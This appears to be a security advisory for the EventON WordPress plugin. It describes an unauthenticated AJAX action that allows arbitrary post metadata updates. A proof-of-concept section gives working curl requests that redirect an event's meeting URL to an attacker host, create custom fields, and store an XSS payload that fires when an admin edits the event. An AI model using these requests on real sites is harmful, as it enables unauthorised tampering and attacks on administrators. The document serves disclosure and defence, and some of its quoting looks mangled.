EventON (Free < 2.2.8, Premium < 4.5.6) - Unauthenticated Arbitrary Post Metadata Update

Description The plugins do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata. Note: Such issue could lead to Unauthenticated Stored XSS due to the lack of sanitisation in the Free plugin before 2.7.7 and Premium before 4.5.5

PoC

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240: curl -X POST --data “eid=240&values;[_vir_url]=https://attacker.com/” ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta’ To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20: curl -X POST --data “eid=20&values;[my_meta]=attacker” ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta’ This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4 curl -X POST --data ‘eid=240&values;[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//’ ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta’ The XSS will be triggered when an admin will edit the event in the backend